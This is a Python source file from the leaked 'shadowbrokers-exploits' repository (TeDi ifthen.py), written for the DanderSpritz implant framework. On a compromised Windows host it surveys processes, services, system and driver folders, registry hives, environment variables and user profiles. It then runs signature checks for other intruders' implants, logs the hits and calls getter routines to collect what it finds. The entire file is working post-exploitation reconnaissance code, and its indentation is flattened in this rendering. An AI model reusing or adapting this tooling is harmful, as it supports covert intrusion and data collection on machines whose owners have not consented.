shadowbrokers-exploits/windows/Resources/TeDi/PyScripts/ifthen.py

147 lines
6.5 KiB
Python
Raw Normal View History

import os
import sys
import dsz.version.checks
import dsz.cmd
import dsz.path.windows
import ops
import datastore
from sigs import FIND_SIG, GET_SIG
def getProcData():
(cmdStatus, cmdId) = dsz.cmd.RunEx('processes -list -minimal', dsz.RUN_FLAG_RECORD)
if (not cmdStatus):
return False
try:
pids = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::Id', dsz.TYPE_INT, cmdId)
ppids = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::ParentId', dsz.TYPE_INT, cmdId)
names = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::Name', dsz.TYPE_STRING, cmdId)
paths = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::Path', dsz.TYPE_STRING, cmdId)
users = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::User', dsz.TYPE_STRING, cmdId)
except RuntimeError:
pids = None
if (pids is None):
return False
datastore.PROCESS_NAME_SET = set(names)
datastore.PROCESS_DATA = zip(pids, ppids, names, paths, users)
return True
def getSvcData():
(cmdStatus, cmdId) = dsz.cmd.RunEx('services', dsz.RUN_FLAG_RECORD)
if (not cmdStatus):
return False
try:
svcnames = dsz.cmd.data.Get('service::servicename', dsz.TYPE_STRING, cmdId)
dispnames = dsz.cmd.data.Get('service::displayname', dsz.TYPE_STRING, cmdId)
states = dsz.cmd.data.Get('service::state', dsz.TYPE_STRING, cmdId)
types = dsz.cmd.data.Get('service::servicetype::value', dsz.TYPE_INT, cmdId)
except RuntimeError:
svcnames = None
if (svcnames is None):
return False
datastore.SERVICE_NAME_SET = set(svcnames)
datastore.SERVICE_DATA = zip(svcnames, dispnames, states, types)
return True
def getFsData():
(syspath, systemroot) = dsz.path.windows.GetSystemPaths()
datastore.SYSPATH_STR = syspath
datastore.SYSTEMROOT_STR = (u'%s\\%s' % (syspath, systemroot))
datastore.DRIVERPATH_STR = (u'%s\\%s\\%s' % (syspath, systemroot, 'drivers'))
datastore.ENV_VARS = {}
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path %s' % syspath), dsz.RUN_FLAG_RECORD)
if cmdStatus:
names = dsz.cmd.data.Get('DirItem::FileItem::name', dsz.TYPE_STRING, cmdId)
datastore.SYSPATH_FILE_SET = set(names)
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path %s' % datastore.SYSTEMROOT_STR), dsz.RUN_FLAG_RECORD)
if cmdStatus:
names = dsz.cmd.data.Get('DirItem::FileItem::name', dsz.TYPE_STRING, cmdId)
datastore.SYSTEMROOT_FILE_SET = set(names)
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path %s' % datastore.DRIVERPATH_STR), dsz.RUN_FLAG_RECORD)
if cmdStatus:
names = dsz.cmd.data.Get('DirItem::FileItem::name', dsz.TYPE_STRING, cmdId)
sizes = dsz.cmd.data.Get('DirItem::FileItem::size', dsz.TYPE_INT, cmdId)
dirflags = dsz.cmd.data.Get('DirItem::FileItem::Attributes::directory', dsz.TYPE_BOOL, cmdId)
datastore.DRIVERPATH_FILE_SET = set(names)
datastore.DRIVERPATH_DATA = zip(names, sizes, dirflags)
(cmdStatus, cmdId) = dsz.cmd.RunEx('registryquery -hive L -key "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList" -value ProfilesDirectory', dsz.RUN_FLAG_RECORD)
if cmdStatus:
try:
[profile_path] = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING, cmdId)
print ('got profile path: %s' % profile_path)
except RuntimeError:
profile_path = None
else:
return False
(suc, cmdid) = dsz.cmd.RunEx('environment -get', dsz.RUN_FLAG_RECORD)
if suc:
cmd_vars = dsz.cmd.data.Get('environment::value', dsz.TYPE_OBJECT, cmdId=cmdid)
for cmd_var in cmd_vars:
[env_var_name] = dsz.cmd.data.Get(('%s::name' % cmd_var), dsz.TYPE_STRING)
[env_var_val] = dsz.cmd.data.Get(('%s::value' % cmd_var), dsz.TYPE_STRING)
datastore.ENV_VARS[env_var_name] = env_var_val
else:
return False
sys_drive = datastore.ENV_VARS.get('SystemDrive')
datastore.PROGRAM_FILES_STR = datastore.ENV_VARS.get('ProgramFiles', ('%s\\..\\Program Files' % datastore.SYSPATH_STR))
if dsz.version.checks.IsOs64Bit():
datastore.PROGRAM_FILESX86_STR = datastore.ENV_VARS.get('ProgramFiles(x86)', ('%s\\..\\Program Files (x86)' % datastore.SYSPATH_STR))
datastore.PROFILE_PATH = profile_path.replace('%%SystemDrive%%', sys_drive)
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path "%s" -dirsonly' % datastore.PROFILE_PATH), dsz.RUN_FLAG_RECORD)
if cmdStatus:
user_dirs = dsz.cmd.data.Get('diritem::fileitem::name', dsz.TYPE_STRING, cmdId)
if ('.' in user_dirs):
user_dirs.remove('.')
if ('..' in user_dirs):
user_dirs.remove('..')
datastore.USER_DIRS_LIST = user_dirs
else:
datastore.USER_DIRS_LIST = list()
return True
def getRegData():
(cmdStatus, cmdId) = dsz.cmd.RunEx('registryquery -hive U', dsz.RUN_FLAG_RECORD)
if (not cmdStatus):
return False
try:
subkeys = dsz.cmd.data.Get('key::subkey::name', dsz.TYPE_STRING, cmdId)
except:
subkeys = None
if (subkeys is None):
return False
datastore.HKEY_USERS_DATA = subkeys
return True
def sigcheck():
dsz.control.Method()
dsz.control.echo.Off()
getProcData()
getSvcData()
getFsData()
getRegData()
sig_found = False
other_peeps = os.path.join(ops.LOGDIR, 'other_peeps.txt')
for x in range(len(FIND_SIG)):
if (FIND_SIG[x] is None):
continue
result = FIND_SIG[x]()
if result:
sig_found = True
try:
with open(other_peeps, 'a') as fd:
fd.write(('SIG%02d FOUND on %s!\n' % ((x + 1), ops.TARGET_ADDR)))
except IOError as ioe:
print ('Error Writing File: %s' % ioe.__str__())
dsz.cmd.RunEx(('script DropboxWrapper.dss AppendFileDefaultName SIG%02d ItsHere' % (x + 1)), 0)
print ('find_%02d return true' % (x + 1))
if (GET_SIG[x] is not None):
print ('calling getter for sig %02d' % (x + 1))
GET_SIG[x]()
else:
print ('find_%02d returned false' % (x + 1))
if (sig_found and os.path.isfile(other_peeps)):
dsz.cmd.RunEx(('local run -command "cmd.exe /c notepad.exe %s"' % other_peeps), 0)
return True
if (__name__ == '__main__'):
if (not sigcheck()):
sys.exit(1)